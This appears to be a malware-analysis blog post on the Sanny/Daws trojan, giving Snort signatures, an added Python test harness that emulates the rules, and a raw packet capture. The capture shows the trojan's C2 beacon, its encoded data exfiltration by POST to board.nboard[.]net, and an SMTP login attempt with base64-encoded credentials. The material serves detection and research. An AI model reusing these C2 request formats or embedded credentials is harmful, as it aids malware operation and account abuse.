Sanny Daws Trojan Malware E-Mail Spamming Threat + Snort Signatures

June 18, 2015

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN W32.Daws/Sanny CnC Initial Beacon"; flow:established,to_server; content:"/list.php?db="; http_uri; content:"Accept-Language|3A| ko-kr"; http_header; classtype:trojan-activity; reference:url,blog.fireeye.com/research/2012/12/to-russia-with-apt.html; reference:url,contagiodump.blogspot.co.uk/2012/12/end-of-year-presents-continue.html; sid:1318811; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN W32.Daws/Sanny CnC POST"; flow:established,to_server; content:"POST"; http_method; content:"/write.php"; http_uri; content:"Accept-Language|3A| ko-kr"; http_header; file_data; content:"db="; within:3; content:"&ch="; distance:0; content:"&name="; distance:0; content:"&email="; distance:0; content:"&pw="; distance:0; classtype:trojan-activity; reference:url,blog.fireeye.com/research/2012/12/to-russia-with-apt.html; reference:url,contagiodump.blogspot.co.uk/2012/12/end-of-year-presents-continue.html; sid:1318812; rev:1;)

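The following is an added example, not code from the original post and not the Snort engine: a small Python re-implementation of the match logic of the two rules above, so that the signatures can be unit-tested against HTTP requests carved from a pcap before they are deployed. The buffer names (uri, headers, body) stand in for the http_uri, http_header and body cursor the rules use; the sample requests are constructed from the GET and POST shown in the capture further down, with the POST body truncated and its encoded "text" parameter replaced by a placeholder. The benign and reordered requests are constructed negatives.

```python
"""Pure-Python emulation of the Sanny/Daws beacon and POST rules (added example)."""

# Constructed from the capture on this page; body shortened, exfil blob replaced.
SANNY_BEACON = (
    "GET /list.php?db=kbaksan_1&p=1 HTTP/1.1\r\n"
    "Host: board.nboard[.]net\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) "
    "Gecko/20081217 Firefox/2.0.0.20\r\n"
    "Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
    "Connection: keep-alive\r\n\r\n"
)
SANNY_POST = (
    "POST /write.php HTTP/1.1\r\n"
    "Host: board.nboard[.]net\r\n"
    "Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(1_0)"
    "&e5=0&e6=&e7=&html=2&text=PLACEHOLDER&tlink="
)
# Constructed negatives: shares tokens with the beacon but a Western locale,
# and the same POST with the form fields no longer starting at the body cursor.
BENIGN_GET = (
    "GET /list.php?db=news&p=1 HTTP/1.1\r\nHost: board.example.test\r\n"
    "Accept-Language: en-us,en;q=0.5\r\n\r\n"
)
REORDERED_POST = SANNY_POST.replace("\r\n\r\ndb=", "\r\n\r\nx=1&db=")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, uri, header block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, _, headers = head.partition("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    return method, uri, headers, body


def content_chain(buf, patterns, first_within=None):
    """Emulate consecutive content matches chained with distance:0 (each
    pattern must occur after the end of the previous match). first_within
    emulates within:N on the first pattern, measured from the cursor start.
    Matches are case-sensitive, as in the rules (no nocase modifier)."""
    pos = 0
    for i, pat in enumerate(patterns):
        idx = buf.find(pat, pos)
        if idx < 0:
            return False
        if i == 0 and first_within is not None and idx + len(pat) > first_within:
            return False
        pos = idx + len(pat)
    return True


def sid_1318811(raw):
    """ET TROJAN W32.Daws/Sanny CnC Initial Beacon: /list.php?db= in the URI
    plus a Korean Accept-Language header."""
    _method, uri, headers, _body = parse_request(raw)
    return "/list.php?db=" in uri and "Accept-Language: ko-kr" in headers


def sid_1318812(raw):
    """ET TROJAN W32.Daws/Sanny CnC POST: POST to /write.php, Korean locale,
    and the board form fields in order with db= at the very start of the body
    (within:3 on a 3-byte pattern pins it to offset 0)."""
    method, uri, headers, body = parse_request(raw)
    return (
        method == "POST"
        and "/write.php" in uri
        and "Accept-Language: ko-kr" in headers
        and content_chain(body, ["db=", "&ch=", "&name=", "&email=", "&pw="], first_within=3)
    )


RULES = {1318811: sid_1318811, 1318812: sid_1318812}


def matching_sids(raw):
    """Return the sids whose emulated logic fires on this request."""
    return [sid for sid, rule in RULES.items() if rule(raw)]


if __name__ == "__main__":
    for label, req in [("beacon", SANNY_BEACON), ("post", SANNY_POST),
                       ("benign", BENIGN_GET), ("reordered", REORDERED_POST)]:
        print(label, matching_sids(req))
```

The reordered case is worth keeping in a regression set: it shows that the `within:3` on the first content is what anchors the chain to the start of the body, so a server-side change that prepends a field would silence the POST rule while the beacon rule still fires.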

2012-10-07 11:39:13.574688 IP 172.16.253.129.53 > 4.2.2.2.53: 26791+ A? board.nboard[.]net. (34)
E..>.d……………5.5.*..h…………board.nboard[.]net…..
2012-10-07 11:39:13.636591 IP 4.2.2.2.53 > 172.16.253.129.53: 26791 1/0/0 A 110.45.140.11 (50)
E..NA*….I……….5.5.:..h…………board.nboard[.]net……………..n-..
2012-10-07 11:39:13.638676 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [S], seq 2194421301, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.f@…U…..n-…o.P..65….p…&………..
2012-10-07 11:39:13.880943 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [S.], seq 4214748835, ack 2194421302, win 64240, options [mss 1460], length 0
E..,A+….U.n-…….P.o.7….66`…I………
2012-10-07 11:39:13.881001 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(.g@…U…..n-…o.P..66.7..P…az..
2012-10-07 11:39:13.886042 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
E….h@…S…..n-…o.P..66.7..P…A…GET /list.php?db=kbaksan_1&p=1 HTTP/1.1
Host: board.nboard[.]net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2012-10-07 11:39:13.886208 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [.], ack 450, win 64240, length 0
E..(A,….U.n-…….P.o.7….7.P…_………
2012-10-07 11:39:13.887021 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [F.], seq 450, ack 1, win 64240, length 0
E..(.i@…U…..n-…o.P..7..7..P…_…
2012-10-07 11:39:13.887137 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [.], ack 451, win 64239, length 0
E..(A-….U.n-…….P.o.7….7.P…_………
2012-10-07 11:39:14.779433 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [P.], seq 1:1449, ack 451, win 64239, length 1448
E…A…..P/n-…….P.o.7….7.P….@..HTTP/1.1 200 OK
Date: Mon, 17 Dec 2012 03:11:49 GMT
Server: Microsoft-IIS/5.0
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
X-Powered-By: PHP/4.3.10
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

f01
2012-10-07 11:39:17.709515 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [.], ack 18825, win 62792, length 0
E..(.n@…U…..n-…o.P..7..8@,P..H….
2012-10-07 11:39:17.835545 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [P.], seq 18825:20273, ack 451, win 64239, length 1448
E…A>….P.n-…….P.o.8@,..7.P…Mm..
(HTML board listing carried in this response; the markup was stripped during extraction. The rows that survive, in the order the columns appear:)
188   MAI-PC_(1_7) [new]   zzzzz   2012-12-17   4
187   (title not recovered)   zzzzz   2012-12-17   4
186   MAI-PC_(1_5) [new]   zzzzz   2012-12-17   2

2012-10-07 11:41:30.928559 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 1:39, ack 1, win 64240, length 38
E..NA…….w……….r\…….P…”S..220 smtp108.mail.kr3.yahoo.com ESMTP

2012-10-07 11:41:30.928728 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 1:13, ack 39, win 64202, length 12
E..4..@………w….r……\…P…….EHLO comxp

2012-10-07 11:41:30.928869 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 13, win 64240, length 0
E..(A…….w……….r\…….P….X……..
2012-10-07 11:41:31.175119 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 39:152, ack 13, win 64240, length 113
E…A……dw……….r\…….P…….250-smtp108.mail.kr3.yahoo.com
250-AUTH LOGIN PLAIN XYMCOOKIE
250-PIPELINING
250-SIZE 41697280
250 8BITMIME

2012-10-07 11:41:31.175434 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 13:25, ack 152, win 64089, length 12
E..4..@………w….r……\..tP..Yc…AUTH LOGIN

2012-10-07 11:41:31.175612 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 25, win 64240, length 0
E..(A…….w……….r\..t….P………….
2012-10-07 11:41:31.395576 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 152:170, ack 25, win 64240, length 18
E..:A…….w……….r\..t….P…U<..334 VXNlcm5hbWU6

2012-10-07 11:41:31.395691 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 25:39, ack 170, win 64071, length 14
E..6..@………w….r……\…P..G.-..bWFpbGJvb3Rl

2012-10-07 11:41:31.395863 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 39, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.616566 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 170:188, ack 39, win 64240, length 18
E..:A…….w……….r\…….P…25..334 UGFzc3dvcmQ6

2012-10-07 11:41:31.616708 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 39:49, ack 188, win 64053, length 10
E..2..@………w….r……\…P..5….MjIzODEy

2012-10-07 11:41:31.616891 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 49, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.843150 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 188:207, ack 49, win 64240, length 19
E..;A…….w……….r\…….P…….530 Access denied

2012-10-07 11:41:31.843173 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [FP.], seq 207, ack 49, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.843210 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [.], ack 208, win 64034, length 0
E..(..@………w….r……\…P..”.Y..
2012-10-07 11:41:31.844100 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [S], seq 4229423237, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…UG….n-…s.P……..p……………
2012-10-07 11:41:32.096260 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [S.], seq 1970311099, ack 4229423238, win 64240, options [mss 1460], length 0
E..,A…..U/n-…….P.sup……`………….
2012-10-07 11:41:32.096295 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(..@…UN….n-…s.P….up..P…*…
2012-10-07 11:41:32.096731 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P…4…POST /write.php HTTP/1.1
Host: board.nboard[.]net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://board.nboard[.]net/form.php?db=kbaksan_1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11328

db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(1_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ-20qusEywTfAGFPaS==7x/=VWTuZo0NV=5qCXuuW9pKqhtZMjsXwDl5YR-J9a8zoVl9sWBdO=G9gpGi6i2w6=RoEiGyruq-QPPtl=jN9PqZ4JKKj7Qpd0unx/lf54L8nQAdJxllllllllllll8c23/8hWzcDq2W6iUW8FnjJbtDMpJPa76/Sfi2GsXWDoPhE5W23S0TsgbRT2wJQuFsmgeEe3hJZauZFc5VNDwHKjpmQGJEW0P0/Ld06icEizlKtK/a8CmD9CMENnE32ZT6Jfk2c48LNeGxQXb4tclUk/mZ6KrP=agC1WLA8ZP5LUP6kkubrOTaWJPV8UYEgsRAuM/NXXTFaaJNtbzLQms6X9WkMLDwIKOp/6S0hg3ExwWN/lllhTlbopYROMqzleZNJ0lGBjnPuOV6lZrS3BBShA67hak7l6W/zyhuBx87cQbspc-hb8UGbVzDZm7nXgDQyrroiM/nnon01lVgT4hixu6xotqTtxSY8BqIK/GRp4J0kRKpNaLF0Z9JSDiIOwV3OeRUz8q5ufcXiAPJfoX5BnNZn4umN70G8iDy73NpZlS8kwdDeRCC1x4thca3rkspme0aJ1ecMkFPEhlgxc3RA1IKRX6LYotku9SeELeLYEVPREb/PxTuDGsrFxyP0m5NISQSF4i4TqbgH1TF8APy0jzYu2FBisoIFXthe3EKx-AnQ8sVtDTml8obFuXUDQMCVRDE-G4e3hL48m0RCnite8pHuPQpb=bzAecMq/0frrJkedes0LciK-dQo3AIWTEalN
2012-10-07 11:41:32.096817 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1461:2921, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…:up..P….~..LYuchNjAtesVpWL-bQ9NfznaGAdgjKsIcPbx1cgnkA=9I9MHFgCIQqRM1qdTmKHStC9cDtCoQoSINoJFD4iOrtOYl84FtnYpZXG34neRKJpnCocaapyAtyQgQwuGl8TU6wiD3zIHuYrKVyRKI/7x6AW=yrX/s4ipZk0qTNhoi-fnGcjr=qo-STM–lPMc/0ypJtai=4Fu2ypcfR9pYxcIqNeCBVJKb5X4ebe1H9MjaY-z=88tyniZHp3BSf4/sS=JQhgTjx5Qtety5xpJF/hOnAOb6LYjtB9LjEI7BLtedE1f6U6ymRyttEKmgyac19fOkkmIWZiKiIli/34Kl-06db9FRxcijMCCdgjnMxH78dx61tlChRPBniRKJcDsqrScVY6PVxW-NjjHNV1gVOKbCR0xXBRzdUn0mUiS4XZga2ZjJNqy-ecn6-McthpHbN2KxWecjd=2m3Oq14iO5OhUISkMJ6DuE4HZVWLQ48cuPiO=64E2wEOrp3lllldFcN0FOdlLrqEVue5ouWdNi6f–rstjosUesd=on-4DB-0rM3ZHenCa6gkPOL=0SbIlRkCbqcF6GHGnkDM4gMrWTEAu4J=42Q-3N-dFhk=OUO5t2OwHi-xQn-ng-WynUZ7r-fKnYfXYSfFQ-LukQt9jXrQLPInE6t-cnop6UmS7HcIlyJ4W8s37iRCjZm09WCjOdG97wY54dAuaH8hVF4OMEUQG4-Da-5=qJO3Tyk60ykiQlleNskPbCFwhTsXQ3hiy97RJwei=79ZFeVMJXRHFpDnwcnjGLBVJiMnVbC2Ca5w=niPePCO1VAKH0u9kcjorlfMpjf-8/wfdSWAtSjC/p6k7eLcCi/ZESGT-YniNgxkUHuQjlPn-7G0offZ4S/ybEA5Ru//XZKsIffOx2wuYkr0bQ=xofs6teBR7rUGF7caU5uVEpQdiAA=lJ1uj5ollllMa5pSlllllMlDPAKQrxGyBHXXl31qxb0im60AfYdm7SlMCeGlY7H2qN4VqGpKZj9knsxgmRXeN5EPDrDJSiTV=BcuzXouz8hP=ml-6IuYRkn3kR0B1x7oPKUsF/8yZzBThFIuDs1o7tN6YNuT2m=LUWXYFRmASCfFzmJ6zFl=PNecNfOEoNXOiyOL=9xgEya=C/uD/=d2xe435jx6qwXJEVOP/gfBq53R12CktrTK3sNDfdHof=SBNjCUseO39st1i9MRjpHQmh0tefV3llEnnbM3MzSAmBe6DUW/B8wD9l6GX2mCbFw5okJaNPSeqkMK22OWpy92lKeHJs6JIWfH=JLj7YWeYg8gZlj7VC=B3Va80CHoy7/UCIHuhRLt4AOCLtjV18-r-NDlr8EcBZfqgCXXbd3StJr6k91UETMD3toMw9Gk3J03Dzj5KrqQsxiWWJu4Y-d0sN=hMn=jCSYZACP1OdokhUnUA06Y8R/wQoSF31det91
2012-10-07 11:41:32.096862 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 1461, win 64240, length 0
E..(A…..U2n-…….P.sup…..:P…$………
2012-10-07 11:41:32.096898 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 2921, win 64240, length 0
E..(A…..U1n-…….P.sup……P….”……..
2012-10-07 11:41:32.096919 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 2921:4381, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P….G..uVEXqEuksuTpK6wFXBxY0KTp/Y6WqPsl0tW6gwytfqQNNmVn4PNS9tpJ3VIpA0EzHRbbNIMkCYFrOjX7iuDXu-UJmjiBA3WIWjQ4Tkx0qHxQb9P7z3ZmH3DUHP/NLQk4=hOD94iOgo0585ikuGDgZ/p/USi6G=P6NYBcQgrd/dB-qP84BGH3HrEGpA6iWnLwiQu6TfiMNDlgafn9K4kByr3dYp/eNpdufSLX27kZXJoeDZdQc1S8Ccj9wZ9SPhfQueLz1Q08D8W4nuHQ0RIKOzh-K=X9XonKBNQb4UzOtuUdqiMEdqHotQQRz5O5UM6VJuhT/mNwUXd3Lfnu-EFUK6jDbCSjJhz=yGVTIIx1G06S9I5ZYp/EV2J4uNxOrRMxG89Aq7jJT7=T6rpfAPI-S32/IslqbrISTeGlqcdzTigXLKRz-ug3IVxeNHnc5PHHcIzmcRk102YX1ZOPbQKukq7-MPH5grW798ii7jYcCP08/KfzFdA4qas73jezyLA6AoF3z3G3kYIlx6LI6RG3wh9lBHY5F=WZB7j98fW9c7p/gHIOxZAF/K2nmu8fq3m7cqcrUUKh7t0k/6n86PixT/j8daQRBFfGNITuJn/iNysoA0BF=M5p-O0sg6sIR6OxMShj0=p4-6B-QSSou=nZyMqq1SPu3=RdU1EALmLZ6G1cQ68j3ahdaOBqxhxju45ZVjaHHoMIGbCB7p2WIblaHlprWzpL67mG8ySbiGHU9x9nePLcekDBqCTs=hu=4N4fihAqQqxnOhFmt4uywwxdth/gAnlABF7cuqXn9eXuBrrW2SX5BeCJ2rTawasE1BNAydbJXuZ889xc6=dhPrs15gN3pt/LRrh4C0w29OEMoNncwsHDBQmVAaPrKaZBxh24R/hL0pbyL5WZf/3N=IjzF900zD3AcR8MC2c/dqAYMw-7CfOhAhip3=oIP9KhXzhb3lBHkkChepAq8MkjPGPps-ejdsUfdYw=xGUTtQ=s4nJ4hZInT-k7kD04ZoI0Wz7dutz/-yeNVqrx-R=MyOFl2LEsrwIu9RJX1P7CacPakLZ49FV0HWwnTqR700qYyxy5ELKxECIdJhzzJUWb6mTXpW/gxeqbAM6hmdOzCmAVqdnMHsJg9hz2AIeT/cJ6hfzpU/8DwoQRQGwCWEZo-Qigw9QpT3mepjP7w4xHGCNue96n/zZ=ZiM=dqI=foqX01O7SQOzRq3ZHubCWrFl/sJd8GqH8uVz5APzlF36GoRYjcG-RjkYrpZdr6r3NUA2nA=Q9tK2NUj7DteKThwZ0ErbFi6DWG44otikCm26sMVWm9tuSDKE3Tw9mROlzoa3ysdANcUz93t0S9qpJ2m6EyHwYU-3GCSfP5MOwIkM74y8Jr2ai9r4M7waOmfj9lTuCJIyJUVINaScha9CtBfxKbjdVWp5sYkm1iriUFhrdNiZ2t4ZZ=aQeZM=
2012-10-07 11:41:32.096967 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 4381:5841, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P…….S8H5OT2XpngwquiRpVRyBicO-3EqVOOTMKT51n5wL8PY2qhHIh1X=MOoTOMI=IUFMtohbxe3Q6b=EoJQI9ZUy6VLTZBUM77BfWIfK3=PhF8Qc86XnW4/OGgzIJhSMZAdwlPApmqb1Eno14WzezWGZ9dfhO3u=xCBu20SlFqkS4IZA5YluOtLddcCxVrEQLil/zzm3wBHS1aVFH6rVTbcw9ydX3CXRXgG/0JsHJbTZl9GlaFOkfa/B9PR5E55xNbix-xWiDUEeFc0U=FGSPPj-LLRfm7ZQnum6A0G0rX/TQP-QykpkPcRJStql=U01CmsFCeTyAReYzVqg6Ld1UgL2FHlJPmbCr2u0MitsbJl3GFfMigIFdasWCuxoDG4XAt3KgM3n5yqV9RX8ZKDbw1BO8VJ66on7y04YSCxdHfwn6gTtNkSsaLdxwsitcSxqouXCh11Y77cuFL3hbQXu52IDN16idMZH91Aq0M8E6-r1MyuClOMO7Qp4TnfcB-u2uKsBULrKsQmkqHCdusmA/WXDcUmRBVf9B-hcqo72Ms4Kaz3a0dHASRkgRpUl9fPkD/z02DHLmX-OB81F4lqASiK3Omyn9-aj7-ixpUYJTfyJIQEta4CgVEXgD5tsgWT3V/Hf6X8XbQGlzYH=YALRNgIUGQf0DlGxBi5FtiGUmcZ1Mal4ZNpyA/QAX0m10sLtj640oo8NBoKaYJMwrUG=w3Eb4cKqy7s55AwRiFiSUNTBWJQaAZmLcyfttmPAUb7tYVqp2Qr9w=Q8u6ZUIKC2mIpT0QM4iGOpdo1BW25yRaFJguFNfHRfnOfgHw8YVj/un-W/PAqyajij25z0YTJ7IzzfKKZ8JXH-71ABMDxfixD3xUfLp=L/uL2ezOzT15xCeO8IusfR/nF2gjCBA8BhEd9gFlNK=OZRGD75NHEsgzVPtkMBwpr1x2NjXRzwi=6kgzlGVDqt6LzbxmydcwkWgNs9ZaQ5I8HM1MkGwLggKGVf5h7JYXc0dPUfxtKqP1bALcKIF5fl0Xgnft0EcJ-J/ZEaccse5OsR=7DRGU-UMQxySdQZLmXx=F-0fE7Wy-hR=JXgw3IC206B51lughE9LLtz5Zxo1A1zeTi4g/UVPmg4-Gbe=toy=M0ZeJty8Yb=5zwX6aD8dSgTgGJ-enV69woLxysiwRjDJOZ-Sfm6Ij63DJQelbfwjJS-JyMOAF7eYY8z07/bceQgPNyjLyYqKpx6i5RCJDkzeIgZ/PW6zslD4jhCB0NdOFJeBho5PWdkQ5fGil/GsfB8CVpqdcz9O==CLnJWcwilftZk=MbFhXRlYhXc6NplGV2Ge9THIPA25DHkdFU4ZZ0Yh=lLjfCJRgwBLecWMT0u1NbDzfrb1C6-gs/-4iJmjHGXIo4CJHfZXU65-nGkfaKu7KX=6ohZsTRpN29ejIYxSmdoD7jEstcidV5PwVCt3F0
2012-10-07 11:41:32.097017 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 4381, win 64240, length 0
E..(A…..U0n-…….P.sup……P….n……..
2012-10-07 11:41:32.097074 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 5841:7301, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…Vup..P…sH..yXeibYuVxXlZbZwi6O2Nc=emfj/nBc803Cam0XrMM0WtNguYJZF6hPVlsg7FhBkD=4tTuNAunX16PsoG/NOSdOMC8o3qGXXx8=3G3Mt8HFKhgndZ-6Kw/rV41V2PhocLr6xmxXcrk3zFLDQAt0-nxbKeK-NpQE4x-Zg0mFH2fNZ1KsTbZKHGsjMXUhTOqRl0kBaHAmE9Q=-ELZhqN3mYCyjVt0Lp3Kh6NzirSSZnmfQStV4R6d0-anrXEWETVjAPYZ2Vm2gGYPo3uBtXGuGJZIEYioPVGT3AaaApI/oHg9GbH7aiPZJpTE-62TGaNQpgQiT6MQ/IZ88t97/CD=VDlxesmP4koDeVknw1sh4xUHOewAK1bcJwxdu/X1LXR7q9f8XcEGSAGQgfEPNPlJqPpqjIHia8OooTKWS1OQE-VIx25uI8wJ9MQrWxgbAgzq8lrAVSJP-QbxNnYQmqRsWZL3Rjjo7AwMjMTPVlTsZYCxsjngo4C6x36EuWxtNIT1Fq=YzLTKA0jGdZrA8dMYi879YXej0KF9n1Y7I63kfKqAtNLlY4BknaAHolsILfoXTX5/I0r2IV7oJ8GMJYpjxChkJlNHJ=QB9LpecloGQzhbueOc4xaym3FB/gbmZxyo1qdmkW0sPaVLpQ3ZpLRWpnJyOZihHot/p0gMkx9KTKVa0BiXJEPzAmkCDKWZuCeioXym/87OHlY0unb9surbf8AIqSaoD3Cni7H-iTaU5Tm/PTmms9XkCkpd/JlkHNV4IG70/xCDxgh7OLYVsDxKuKxSgbHtELrG=oGNC9AwZs9/TQDEC4UOpmSP8C183eP=a9SjzHoIbq97pl3MII/nyl=4LC/5prxb2UR0QkL45Rbf/XwumlPX8pZJ6doNjN0RRhWRHVLECzpld1CZSJO6TZIEnlfthV6d-N-UU3H17ru9249=xt3LA=10QxCA8ElTzFw00p=xZeMYiSltSRorHj9nws/9do6dOL/axJakF/Rs-IBwSXiaZWs58=SeZ6/G8m9iqSt2rim8jCeNgjxB=qlynlQoflQTsr3ne4frQlej9-lWlfNu15xoyrM8ahkoXLONYtDp2ul/2ytuWgZwoGW8ug2JTIDDCDyOU-sLJW1=cKDOWCdATdS2AJ5u7T8t9/2Jfx909ygNXgy3chrP5YpJZtNAGGpMdq3Ft-YJEDA50=kAyYO97A2sGE3-/YQNLUuNO/itN1jm4HFZzH1idlBCOMWEU8rQqPSIIjn20Ur8OEWTg2wNxtwP-9jyz0hBmPUKB4FG4Fo4-1pAi55BTVVfiYOSPC0rLc4cHN3H-7R93whY5VSnrckbh3W27Z4iHlfgAS3dUZaUz08hJxkbhz0Nk0Tl8RL43iIN4h3Wg267U-KBUNLbouCULlOHtoUVUweax=Xm1BLj0TigQ5HsOpPXd0E-EJqg3lF2JJ3lVegw=oMus6yMIg
2012-10-07 11:41:32.097104 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 5841, win 64240, length 0
E..(A…..U/n-…….P.sup…..VP………….
2012-10-07 11:41:32.097159 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 7301:8761, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…
up..P….+..aG9m5MTH8sWbW11TLRKk9/WmNz5ofp7aULCQ/nB4qr1k=wD3/6iaka/gV5-PdP=w7q58zyQ9zn4DbJeCuqAYYVPzo2qgI25-89lXBlQ0QKW2oZKwMIqHhir5stUuCZ9gLTj7DB-pRAyAXyK7G0rVwH9RpTsjj9J0Wno2SQZGWKsTc9itx3xM3Wd1xOXLix8hYOs67iQmpFj-H6Bqkz54gKD4lTInr/7176hDVddfB357zX5lbjc=yVxw6enXOX8UT1mEw0zsPnQuU=EmeE1DrrPm5yMY/70UdKkXKgnIypzz/HaEuenpczyZ7PuMxUbGG9ofT42=g3m-FSi0L2Upd=L9/XHWozT8nPq/qkE=Et/i0SKwJnFp2RWWCP3i1H0kiGcO-TBW/-9S6wP12N92mloWQc4OsByLYFOAn8OQUdsWBmPGUXUMOVW1Rd9js0b2pIRlr44unb2TmL7nubCWJjRbWRUrL0VpzUz1G1ypymCNc1rzTIc8z3FpjQTUxJP7pQRjwa9MLwQXsAZtfR3-PnKcnR1tgjErRRyj2z63Cla8dxZa7y9xq70Lcdoe-xBB3FwML5SCizJS0yXa8RbMZGsg9hdC/H3OXDBjg1jRNZaRI5Qb2E/VcpfmUMw-u/HYjka6zSuO0D8NT4-5XINh3U=aMzthmluO/quLdkAV4K3-GhV1y7jmZOknSH9g/c=cG=-cs29dlVrfSn/BldIpqMwJZJKYr2MhkTOOzljZ3PwegMEYjKrTCCgbRHiW4cft9deoG7jX4e0b94qwncS-pjHhsNTg4EnktW3nEPVzToitJ4G/BBZqPy3WhAoX=FJum8HiZLii=tkPpI1wjC7nQFF=DRM=TyqJ1D3RguX8F53kQgoTUQ2L9HxooqD0gm1lH/C9DHkdzUNJy56cZHPYUIYC0FlSjuPXNu4wBzS9MsICRK8tbX=y=0ajqFY/TaMpRfuoGSsGRihr5OIwIStke/7HGbLI7ggSWf5/VVABwRUMckhIVJ39AXomIiV/xNaLKBKJXfNZxKgVUN43yhkjGF4c2BykqrNLYdog=XEidign5AZjIyPXu/68WGd0xgOXZ/SU63sNkr/eGswLbPCwArdGc2J4bfp=c/nfypy5aJEQMC0upCNE-d3ZcQk2/GX0Aps4a9MHn1Wyuk15T7/RM5DAorAcnBf15HJajM3IEwEXMKgGqiCAuBh2/B5UXSoid98aFXyd9EhrGoHgc/dfuRtFcG8EAzsjYspgVH6XDVDE4/bbN/eFXNcEq6bKewDLlzDOBPcdE=eMT8hHPWTR9h5jbOq49PmZE6UxDujMRXSTF7l=9eFrmwM88QOsOnq6KwOL52aX2MDmhhdrnxgRL90rYcAkXQ1-mO7-f769brKJUlTulsnF=n9DOq6ujeuHB5Mb39o3gzYoJ5FeWpD9oD3qHxVgyLg8nwSsEYdr/1y86NQGiQJS
2012-10-07 11:41:32.097188 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 7301, win 64240, length 0
E..(A…..U.n-…….P.sup…..
P………….
2012-10-07 11:41:32.097262 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 8761:10221, ack 1, win 64240, length 1460
